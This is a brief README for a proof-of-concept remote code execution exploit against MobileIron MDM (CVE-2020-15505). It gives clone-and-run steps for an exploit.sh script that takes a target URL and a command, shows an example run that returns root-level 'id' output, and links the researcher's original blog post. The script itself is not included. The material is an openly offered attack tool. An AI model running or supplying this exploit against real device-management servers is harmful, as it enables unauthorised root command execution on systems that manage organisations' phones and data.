CVE-2020-15505
RCE on MobileIron MDM PoC
Usage
git clone https://github.com/swiper/CVE-2020-15505
cd CVE-2020-15505/
chmod +x exploit.sh
./exploit.sh <url> <cmd>
Example
# ./exploit.sh http://localhost/ id
uid=0(root) gid=0(root) groups=0(root)
Original blog post
https://blog.orange.tw/2020/09/how-i-hacked-facebook-again-mobileiron-mdm-rce.html
NOTE this is my personal code, only made for myself. only to be used by myself. don't use.